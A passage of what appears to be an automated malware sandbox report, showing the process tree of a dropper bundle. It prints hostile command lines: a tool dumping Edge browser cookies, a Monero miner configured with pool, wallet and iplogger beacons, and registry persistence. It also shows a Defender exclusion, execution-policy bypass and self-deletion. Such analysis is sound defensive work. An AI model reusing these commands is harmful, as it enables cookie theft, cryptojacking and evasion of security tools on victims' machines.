                                                          PID:6876
                                                        • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                          C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                          4⤵
                                                            PID:5028
                                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                            4⤵
                                                              PID:1972
                                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                              4⤵
                                                                PID:7296
                                                            • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                              "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                              3⤵
                                                              • Executes dropped EXE
                                                              • Checks whether UAC is enabled
                                                              PID:5788
                                                            • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                              "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                              3⤵
                                                              • Executes dropped EXE
                                                              PID:5808
                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                4⤵
                                                                • Executes dropped EXE
                                                                PID:6756
                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                4⤵
                                                                  PID:7736
                                                            • C:\Users\Admin\Documents\OLjczNcDtq7CoaIKvC_Bno9N.exe
                                                              "C:\Users\Admin\Documents\OLjczNcDtq7CoaIKvC_Bno9N.exe"
                                                              2⤵
                                                              • Executes dropped EXE
                                                              PID:2388
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 660
                                                                3⤵
                                                                • Program crash
                                                                PID:4776
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 644
                                                                3⤵
                                                                • Program crash
                                                                PID:4640
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 668
                                                                3⤵
                                                                • Program crash
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:5232
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 664
                                                                3⤵
                                                                • Program crash
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:5544
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 1076
                                                                3⤵
                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                • Program crash
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:6100
                                                            • C:\Users\Admin\Documents\vS47HnWIzHHa4hVfThGAUC5I.exe
                                                              "C:\Users\Admin\Documents\vS47HnWIzHHa4hVfThGAUC5I.exe"
                                                              2⤵
                                                              • Executes dropped EXE
                                                              PID:4272
                                                              • C:\Users\Admin\Documents\vS47HnWIzHHa4hVfThGAUC5I.exe
                                                                "C:\Users\Admin\Documents\vS47HnWIzHHa4hVfThGAUC5I.exe" -q
                                                                3⤵
                                                                • Executes dropped EXE
                                                                PID:5912
                                                            • C:\Users\Admin\Documents\WSLPIDqG5PyYGNx82zzOUOno.exe
                                                              "C:\Users\Admin\Documents\WSLPIDqG5PyYGNx82zzOUOno.exe"
                                                              2⤵
                                                              • Executes dropped EXE
                                                              PID:4388
                                                              • C:\Users\Admin\AppData\Local\Temp\is-NA9QA.tmp\WSLPIDqG5PyYGNx82zzOUOno.tmp
                                                                "C:\Users\Admin\AppData\Local\Temp\is-NA9QA.tmp\WSLPIDqG5PyYGNx82zzOUOno.tmp" /SL5="$60116,138429,56832,C:\Users\Admin\Documents\WSLPIDqG5PyYGNx82zzOUOno.exe"
                                                                3⤵
                                                                  PID:2204
                                                                  • C:\Users\Admin\AppData\Local\Temp\is-5P6UQ.tmp\Setup.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\is-5P6UQ.tmp\Setup.exe" /Verysilent
                                                                    4⤵
                                                                    • Executes dropped EXE
                                                                    PID:4932
                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe
                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
                                                                      5⤵
                                                                      • Executes dropped EXE
                                                                      PID:1112
                                                                      • C:\Users\Admin\AppData\Local\Temp\is-UM697.tmp\Stats.tmp
                                                                        "C:\Users\Admin\AppData\Local\Temp\is-UM697.tmp\Stats.tmp" /SL5="$103C4,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
                                                                        6⤵
                                                                        • Executes dropped EXE
                                                                        • Loads dropped DLL
                                                                        • Suspicious use of FindShellTrayWindow
                                                                        PID:6172
                                                                        • C:\Users\Admin\AppData\Local\Temp\is-DGD57.tmp\builder.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\is-DGD57.tmp\builder.exe" -algo'' -pool'stratum+tcp://xmr-asia1.nanopool.org:14444' -wallet'42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s' -load'50' -idleload'50' -loggerSa'2no.co' -loggerS'1C6Ua7' -loggerRa'iplogger.org' -loggerR'1cmAy7' -loggerWa'2no.co' -loggerW'' -ico'' -glue'' -error'' -worker'' -icrypt'' -sremoval'' -ntask'SystemCheck' -ptask'System\' -atask'Microsoft_Corporation' -dtask'Starts_a_system_diagnostics_application_to_scan_for_errors_and_performance_problems.' -pinstall'Roaming\Microsoft\Windows\' -ninstall'Helper' -sinstall'-SystemCheck'
                                                                          7⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                          • Suspicious use of SetWindowsHookEx
                                                                          PID:6920
                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe
                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"
                                                                      5⤵
                                                                      • Executes dropped EXE
                                                                      PID:512
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 512 -s 816
                                                                        6⤵
                                                                        • Program crash
                                                                        PID:7668
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 512 -s 952
                                                                        6⤵
                                                                        • Program crash
                                                                        PID:7192
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 512 -s 1084
                                                                        6⤵
                                                                        • Program crash
                                                                        PID:5708
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 512 -s 1064
                                                                        6⤵
                                                                        • Program crash
                                                                        PID:5392
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 512 -s 1140
                                                                        6⤵
                                                                        • Program crash
                                                                        PID:2688
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 512 -s 1176
                                                                        6⤵
                                                                        • Program crash
                                                                        PID:4784
                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                      5⤵
                                                                      • Executes dropped EXE
                                                                      PID:876
                                                                      • C:\Users\Admin\AppData\Local\Temp\is-N82VE.tmp\Inlog.tmp
                                                                        "C:\Users\Admin\AppData\Local\Temp\is-N82VE.tmp\Inlog.tmp" /SL5="$103C8,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                        6⤵
                                                                        • Executes dropped EXE
                                                                        • Loads dropped DLL
                                                                        • Suspicious use of FindShellTrayWindow
                                                                        PID:6232
                                                                        • C:\Users\Admin\AppData\Local\Temp\is-VA99M.tmp\Setup.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\is-VA99M.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                          7⤵
                                                                            PID:6332
                                                                            • C:\Users\Admin\AppData\Local\Temp\is-5205H.tmp\Setup.tmp
                                                                              "C:\Users\Admin\AppData\Local\Temp\is-5205H.tmp\Setup.tmp" /SL5="$20434,17356095,721408,C:\Users\Admin\AppData\Local\Temp\is-VA99M.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                              8⤵
                                                                              • Loads dropped DLL
                                                                              • Suspicious use of FindShellTrayWindow
                                                                              PID:4940
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-Q5CA8.tmp\{app}\microsoft.cab -F:* %ProgramData%
                                                                                9⤵
                                                                                  PID:6892
                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    10⤵
                                                                                    • Executes dropped EXE
                                                                                    • Loads dropped DLL
                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                    PID:6400
                                                                                  • C:\Windows\SysWOW64\expand.exe
                                                                                    expand C:\Users\Admin\AppData\Local\Temp\is-Q5CA8.tmp\{app}\microsoft.cab -F:* C:\ProgramData
                                                                                    10⤵
                                                                                      PID:2516
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                    9⤵
                                                                                      PID:4268
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                        10⤵
                                                                                          PID:9372
                                                                                      • C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
                                                                                        "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
                                                                                        9⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        PID:6204
                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-Q5CA8.tmp\{app}\vdi_compiler.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-Q5CA8.tmp\{app}\vdi_compiler"
                                                                                        9⤵
                                                                                          PID:9440
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          "cmd.exe" /c start http://afleof21klg.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
                                                                                          9⤵
                                                                                            PID:5236
                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
                                                                                    5⤵
                                                                                    • Executes dropped EXE
                                                                                    • Loads dropped DLL
                                                                                    • Enumerates connected drives
                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                    PID:5588
                                                                                    • C:\Windows\SysWOW64\msiexec.exe
                                                                                      "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629579447 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
                                                                                      6⤵
                                                                                        PID:8952
                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                      5⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:5336
                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-T8FP1.tmp\WEATHER Manager.tmp
                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-T8FP1.tmp\WEATHER Manager.tmp" /SL5="$103DC,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                        6⤵
                                                                                          PID:6400
                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-0Q8AB.tmp\Setup.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-0Q8AB.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
                                                                                            7⤵
                                                                                            • Loads dropped DLL
                                                                                            • Enumerates connected drives
                                                                                            • Modifies system certificate store
                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                            PID:6056
                                                                                            • C:\Windows\SysWOW64\msiexec.exe
                                                                                              "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-0Q8AB.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-0Q8AB.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629579447 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
                                                                                              8⤵
                                                                                                PID:9672
                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                          5⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:6160
                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-97OC2.tmp\VPN.tmp
                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-97OC2.tmp\VPN.tmp" /SL5="$302C8,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                            6⤵
                                                                                            • Executes dropped EXE
                                                                                            • Loads dropped DLL
                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                            PID:6384
                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-89SK9.tmp\Setup.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-89SK9.tmp\Setup.exe" /silent /subid=720
                                                                                              7⤵
                                                                                                PID:5316
                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-2L252.tmp\Setup.tmp
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-2L252.tmp\Setup.tmp" /SL5="$20542,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-89SK9.tmp\Setup.exe" /silent /subid=720
                                                                                                  8⤵
                                                                                                  • Loads dropped DLL
                                                                                                  • Modifies registry class
                                                                                                  • Modifies system certificate store
                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                  PID:6408
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                                                    9⤵
                                                                                                      PID:9808
                                                                                                      • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                        tapinstall.exe remove tap0901
                                                                                                        10⤵
                                                                                                        • Checks SCSI registry key(s)
                                                                                                        PID:9272
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                                                                      9⤵
                                                                                                        PID:5236
                                                                                                        • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                          tapinstall.exe install OemVista.inf tap0901
                                                                                                          10⤵
                                                                                                          • Drops file in System32 directory
                                                                                                          • Drops file in Windows directory
                                                                                                          • Checks SCSI registry key(s)
                                                                                                          • Modifies system certificate store
                                                                                                          PID:3224
                                                                                                      • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                                                                        9⤵
                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                        PID:8656
                                                                                                      • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                                                                        9⤵
                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                        PID:9900
                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
                                                                                                5⤵
                                                                                                • Executes dropped EXE
                                                                                                • Checks computer location settings
                                                                                                PID:6316
                                                                                                • C:\Users\Admin\Documents\6clN5xvETRL6kERccekuqVhJ.exe
                                                                                                  "C:\Users\Admin\Documents\6clN5xvETRL6kERccekuqVhJ.exe"
                                                                                                  6⤵
                                                                                                    PID:6968
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 6968 -s 432
                                                                                                      7⤵
                                                                                                      • Program crash
                                                                                                      PID:516
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 6968 -s 260
                                                                                                      7⤵
                                                                                                      • Program crash
                                                                                                      PID:6252
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 6968 -s 624
                                                                                                      7⤵
                                                                                                      • Program crash
                                                                                                      PID:2244
                                                                                                  • C:\Users\Admin\Documents\swtQ_kQ60R4bOVQ6Dd15UNQC.exe
                                                                                                    "C:\Users\Admin\Documents\swtQ_kQ60R4bOVQ6Dd15UNQC.exe"
                                                                                                    6⤵
                                                                                                    • Checks BIOS information in registry
                                                                                                    • Checks whether UAC is enabled
                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                    PID:5096
                                                                                                  • C:\Users\Admin\Documents\KpjPIX3RbT37g8FePr7b8TT3.exe
                                                                                                    "C:\Users\Admin\Documents\KpjPIX3RbT37g8FePr7b8TT3.exe"
                                                                                                    6⤵
                                                                                                      PID:6816
                                                                                                    • C:\Users\Admin\Documents\DZKe0ExidWjFPEXH7EkvvULl.exe
                                                                                                      "C:\Users\Admin\Documents\DZKe0ExidWjFPEXH7EkvvULl.exe"
                                                                                                      6⤵
                                                                                                        PID:6300
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im "DZKe0ExidWjFPEXH7EkvvULl.exe" /f & erase "C:\Users\Admin\Documents\DZKe0ExidWjFPEXH7EkvvULl.exe" & exit
                                                                                                          7⤵
                                                                                                            PID:9192
                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                              taskkill /im "DZKe0ExidWjFPEXH7EkvvULl.exe" /f
                                                                                                              8⤵
                                                                                                              • Kills process with taskkill
                                                                                                              PID:6692
                                                                                                        • C:\Users\Admin\Documents\REs6Y2MTtw3EO9CXiC2zBXPT.exe
                                                                                                          "C:\Users\Admin\Documents\REs6Y2MTtw3EO9CXiC2zBXPT.exe"
                                                                                                          6⤵
                                                                                                            PID:5712
                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                              C:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\RES6Y2~1.DLL,s C:\Users\Admin\DOCUME~1\RES6Y2~1.EXE
                                                                                                              7⤵
                                                                                                              • Blocklisted process makes network request
                                                                                                              • Loads dropped DLL
                                                                                                              PID:9488
                                                                                                              • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                                                                C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\RES6Y2~1.DLL,sU9iQg==
                                                                                                                8⤵
                                                                                                                • Blocklisted process makes network request
                                                                                                                • Checks processor information in registry
                                                                                                                • Modifies system certificate store
                                                                                                                PID:5792
                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\RES6Y2~1.DLL
                                                                                                                  9⤵
                                                                                                                    PID:6552
                                                                                                                  • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                                                                    C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\RES6Y2~1.DLL,lF80M2Zv
                                                                                                                    9⤵
                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                    • Checks processor information in registry
                                                                                                                    PID:9852
                                                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                                                      C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 31804
                                                                                                                      10⤵
                                                                                                                        PID:4564
                                                                                                                        • C:\Windows\system32\ctfmon.exe
                                                                                                                          ctfmon.exe
                                                                                                                          11⤵
                                                                                                                            PID:2704
                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmpE0D3.tmp.ps1"
                                                                                                                        9⤵
                                                                                                                          PID:9444
                                                                                                                  • C:\Users\Admin\Documents\EkaEeYUJ9qbzhAv6DQxGkfOK.exe
                                                                                                                    "C:\Users\Admin\Documents\EkaEeYUJ9qbzhAv6DQxGkfOK.exe"
                                                                                                                    6⤵
                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                    PID:6520
                                                                                                                    • C:\Users\Admin\Documents\EkaEeYUJ9qbzhAv6DQxGkfOK.exe
                                                                                                                      "C:\Users\Admin\Documents\EkaEeYUJ9qbzhAv6DQxGkfOK.exe"
                                                                                                                      7⤵
                                                                                                                        PID:5636
                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          8⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Loads dropped DLL
                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                          PID:2204
                                                                                                                    • C:\Users\Admin\Documents\xzc7mhwIu1PdBVyyUQBrEuM9.exe
                                                                                                                      "C:\Users\Admin\Documents\xzc7mhwIu1PdBVyyUQBrEuM9.exe"
                                                                                                                      6⤵
                                                                                                                      • Checks BIOS information in registry
                                                                                                                      • Checks whether UAC is enabled
                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                      PID:7204
                                                                                                                    • C:\Users\Admin\Documents\O6R8bigA5Y8Wz57DWWDfo50o.exe
                                                                                                                      "C:\Users\Admin\Documents\O6R8bigA5Y8Wz57DWWDfo50o.exe"
                                                                                                                      6⤵
                                                                                                                        PID:7380
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-HPGBT.tmp\O6R8bigA5Y8Wz57DWWDfo50o.tmp
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-HPGBT.tmp\O6R8bigA5Y8Wz57DWWDfo50o.tmp" /SL5="$4024A,138429,56832,C:\Users\Admin\Documents\O6R8bigA5Y8Wz57DWWDfo50o.exe"
                                                                                                                          7⤵
                                                                                                                          • Loads dropped DLL
                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                          PID:7440
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-E27B9.tmp\Setup.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-E27B9.tmp\Setup.exe" /Verysilent
                                                                                                                            8⤵
                                                                                                                              PID:8988
                                                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
                                                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
                                                                                                                                9⤵
                                                                                                                                • Loads dropped DLL
                                                                                                                                • Enumerates connected drives
                                                                                                                                • Modifies system certificate store
                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                PID:8336
                                                                                                                                • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                  "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629579447 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
                                                                                                                                  10⤵
                                                                                                                                    PID:7460
                                                                                                                          • C:\Users\Admin\Documents\WM2nzHfU62heTdMppahKgkFG.exe
                                                                                                                            "C:\Users\Admin\Documents\WM2nzHfU62heTdMppahKgkFG.exe"
                                                                                                                            6⤵
                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                            PID:7728
                                                                                                                            • C:\Users\Admin\Documents\WM2nzHfU62heTdMppahKgkFG.exe
                                                                                                                              C:\Users\Admin\Documents\WM2nzHfU62heTdMppahKgkFG.exe
                                                                                                                              7⤵
                                                                                                                                PID:7664
                                                                                                                              • C:\Users\Admin\Documents\WM2nzHfU62heTdMppahKgkFG.exe
                                                                                                                                C:\Users\Admin\Documents\WM2nzHfU62heTdMppahKgkFG.exe
                                                                                                                                7⤵
                                                                                                                                  PID:6680
                                                                                                                                • C:\Users\Admin\Documents\WM2nzHfU62heTdMppahKgkFG.exe
                                                                                                                                  C:\Users\Admin\Documents\WM2nzHfU62heTdMppahKgkFG.exe
                                                                                                                                  7⤵
                                                                                                                                    PID:4128
                                                                                                                                • C:\Users\Admin\Documents\txKQAreIHN7hOJONKNSsGcpa.exe
                                                                                                                                  "C:\Users\Admin\Documents\txKQAreIHN7hOJONKNSsGcpa.exe"
                                                                                                                                  6⤵
                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                  PID:7720
                                                                                                                                • C:\Users\Admin\Documents\5wW3JJ3in_MhW5OLgcREHH7n.exe
                                                                                                                                  "C:\Users\Admin\Documents\5wW3JJ3in_MhW5OLgcREHH7n.exe"
                                                                                                                                  6⤵
                                                                                                                                    PID:7712
                                                                                                                                    • C:\Users\Admin\Documents\5wW3JJ3in_MhW5OLgcREHH7n.exe
                                                                                                                                      "C:\Users\Admin\Documents\5wW3JJ3in_MhW5OLgcREHH7n.exe"
                                                                                                                                      7⤵
                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                      PID:6508
                                                                                                                                  • C:\Users\Admin\Documents\BKBYVzDDbbYNgYtd_Ht1La3W.exe
                                                                                                                                    "C:\Users\Admin\Documents\BKBYVzDDbbYNgYtd_Ht1La3W.exe"
                                                                                                                                    6⤵
                                                                                                                                      PID:7704
                                                                                                                                      • C:\Users\Admin\AppData\Roaming\3756728.exe
                                                                                                                                        "C:\Users\Admin\AppData\Roaming\3756728.exe"
                                                                                                                                        7⤵
                                                                                                                                          PID:8456
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\2483760.exe
                                                                                                                                          "C:\Users\Admin\AppData\Roaming\2483760.exe"
                                                                                                                                          7⤵
                                                                                                                                          • Suspicious behavior: SetClipboardViewer
                                                                                                                                          PID:8480
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\5772911.exe
                                                                                                                                          "C:\Users\Admin\AppData\Roaming\5772911.exe"
                                                                                                                                          7⤵
                                                                                                                                            PID:8524
                                                                                                                                          • C:\Users\Admin\AppData\Roaming\5048853.exe
                                                                                                                                            "C:\Users\Admin\AppData\Roaming\5048853.exe"
                                                                                                                                            7⤵
                                                                                                                                              PID:8584
                                                                                                                                          • C:\Users\Admin\Documents\TCYQ8juq3RMERcrHLAQHvAGp.exe
                                                                                                                                            "C:\Users\Admin\Documents\TCYQ8juq3RMERcrHLAQHvAGp.exe"
                                                                                                                                            6⤵
                                                                                                                                              PID:7696
                                                                                                                                            • C:\Users\Admin\Documents\WxZaIwb1Cl3idM1j7YTWWe9G.exe
                                                                                                                                              "C:\Users\Admin\Documents\WxZaIwb1Cl3idM1j7YTWWe9G.exe"
                                                                                                                                              6⤵
                                                                                                                                                PID:7688
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
